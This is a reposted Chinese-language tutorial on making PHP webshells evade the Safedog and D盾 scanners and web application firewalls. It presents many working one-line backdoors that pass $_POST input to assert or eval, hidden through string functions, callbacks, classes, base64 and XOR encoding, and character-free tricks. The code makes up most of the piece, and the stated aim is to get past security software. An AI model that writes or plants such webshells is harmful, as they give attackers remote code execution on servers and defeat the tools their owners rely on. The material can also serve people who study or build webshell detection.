轉自圈子404師傅

0x01 前言#

盡最大努力在一文中讓大家掌握一些有用的WEBSHELL免殺技巧

0x02 目錄#

關于eval 于 assert

字符串變形

定義函數繞過

回調函數

回調函數變形

特殊字符干擾

數組

類

編碼繞過

無字符特征馬

PHP7.1后webshell何去何從

總結

0x03 關于eval 于 assert#

關于eval函數在php給出的官方說明是

eval 是一個語言構造器而不是一個函數，不能被 可變函數 調用
可變函數：通過一個變量，獲取其對應的變量值，然后通過給該值增加一個括號()，讓系統認為該值是一個函數，從而當做函數來執行
通俗的說比如你?<?php $a=eval;$a() ?>?這樣是不行的 也造就了用eval的話達不到assert的靈活，但是在php7.1以上assert已經不行

關于assert函數

assert() 回調函數在構建自動測試套件的時候尤其有用，因為它們允許你簡易地捕獲傳入斷言的代碼，并包含斷言的位置信息。 當信息能夠被其他方法捕獲，使用斷言可以讓它更快更方便！

0x04 字符串變形#

字符串變形多數用于BYPASS安全狗，相當對于D盾，安全狗更加重視"形"
一個特殊的變形就能繞過安全狗，看看PHP手冊，有著很多關于操作字符串的函數

ucwords() //函數把字符串中每個單詞的首字符轉換為大寫。
ucfirst() //函數把字符串中的首字符轉換為大寫。
trim() //函數從字符串的兩端刪除空白字符和其他預定義字符。
substr_replace() //函數把字符串的一部分替換為另一個字符串
substr() //函數返回字符串的一部分。
strtr() //函數轉換字符串中特定的字符。
strtoupper() //函數把字符串轉換為大寫。
strtolower() //函數把字符串轉換為小寫。
strtok() //函數把字符串分割為更小的字符串
str_rot13() //函數對字符串執行 ROT13 編碼。

?

由于PHP的靈活性操作字符串的函數很多，我這里就不一一列舉了

用substr_replace()?函數變形assert 達到免殺的效果

<?php $a = substr_replace("assexx","rt",4);$a($_POST['x']);?>

?

其他函數類似 不一一列舉了

0x05 定義函數繞過#

定義一個函數把關鍵詞分割達到bypass效果

<?php function kdog($a){ $a($_POST['x']);}kdog(assert);?>

反之

<?php function kdog($a){ assert($a);}kdog($_POST[x]);?>

?

效果一樣，這種繞過方法，對安全狗還是比較有效的 在d盾面前就顯得小兒科了 ，不過后面會講到如何用定義函數的方法來 繞過d盾

0x05 回調函數#

call_user_func_array()call_user_func()array_filter() array_walk() array_map()registregister_shutdown_function()register_tick_function()filter_var() filter_var_array() uasort() uksort() array_reduce()array_walk() array_walk_recursive()

回調函數大部分已經被安全軟件加入全家桶套餐 所以找到一個生僻的不常用的回調函數來執行 比如

<?php forward_static_call_array(assert,array($_POST[x]));?>

這個函數能過狗，但是D盾顯示是一級

0x05 回調函數變形#

前面說過眾多回調函數已經被加入豪華套餐了，怎么繞過呢，其實也很簡單 那就是定義個函數 或者類來調用

定義一個函數

<?php function test($a,$b){ array_map($a,$b);}test(assert,array($_POST['x']));?>

定義一個類

<?php class loveme { var $a; var $b; function __construct($a,$b) { $this->a=$a; $this->b=$b; } function test() { array_map($this->a,$this->b); }}$p1=new loveme(assert,array($_POST['x']));$p1->test();?>

?

0x06 特殊字符干擾#

特殊字符干擾，要求是能干擾到殺軟的正則判斷，還要代碼能執行,網上廣為流傳的連接符

初代版本

<?php $a = $_REQUEST['a'];$b = null;eval($b.$a);?>

?

不過已經不能免殺了，利用適當的變形即可免殺 如

<?php $a = $_POST['a'];$b = "\n";eval($b.=$a);?>

?

其他方法大家盡情發揮如"\r\n\t",函數返回，類，等等

除了連接符號 還有個命名空間的東西 \ 具體大家可以看看php手冊

<?php function dog($a){\assert($a);}dog($_POST[x]);?>

?

當然還有其他的符號熟讀PHP手冊就會有不一樣的發現

0x07 數組#

把執行代碼放入數組中執行繞過

<?php $a = substr_replace("assexx","rt",4);$b=[''=>$a($_POST['q'])];?>

多維數組

<?php $b = substr_replace("assexx","rt",4);$a = array($arrayName = array('a' => $b($_POST['q'])));?>

0x08 類#

說到類肯定要搭配上魔術方法比如?__destruct()，__construct()
直接上代碼

<?php class me{ public $a = ''; function __destruct(){ assert("$this->a"); }}$b = new me;$b->a = $_POST['x'];?>

用類把函數包裹,D盾對類查殺較弱

0x09 編碼繞過#

用php的編碼函數，或者用異或等等
簡單的base64_decode,其中因為他的正則匹配可以加入一些下劃線干擾殺軟

<?php $a = base64_decode("YXNz+ZX____J____0");$a($_POST[x]);?>

異或

<?php $a= ("!"^"@").'ssert';$a($_POST[x]);?>

0x9 無字符特征馬#

對于無特征馬這里我的意思是 無字符特征

利用異或,編碼等方式 例如p神博客的

<?php $_=('%01'^'`').('%13'^'`').('%13'^'`').('%05'^'`').('%12'^'`').('%14'^'`'); //$_='assert';
$__='_'.('%0D'^']').('%2F'^'`').('%0E'^']').('%09'^']'); //$__='_POST';
$___=$$__;$_($___[_]); //assert($_POST[_]);
?>

利用正則匹配字符 如Tab等 ?然后轉換為字符

利用POST包獲取關鍵參數執行 例如

<?php $decrpt = $_POST['x'];$arrs = explode("|", $decrpt)[1];$arrs = explode("|", base64_decode($arrs));call_user_func($arrs[0],$arrs[1]);?>

0x10 PHP7.1后webshell何去何從#

在php7.1后面我們已經不能使用強大的assert函數了用eval將更加注重特殊的調用方法和一些字符干擾,后期大家可能更加傾向使用大馬

總結#

對于安全狗殺形，d盾殺參的思路來繞過。生僻的回調函數,特殊的加密方式,以及關鍵詞的后傳入都是不錯的選擇。
對于關鍵詞的后傳入對免殺安全狗，d盾，河馬 等等都是不錯的，后期對于菜刀的輪子，也要走向高度的自定義化
用戶可以對傳出的post數據進行自定義腳本加密，再由webshell進行解密獲取參數，那么以現在的軟WAF查殺能力
幾乎為0，安全軟件也需要與時俱進了。

轉載于:https://www.cnblogs.com/-qing-/p/10631414.html

總結

以上是生活随笔為你收集整理的Webshell免杀绕过waf的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。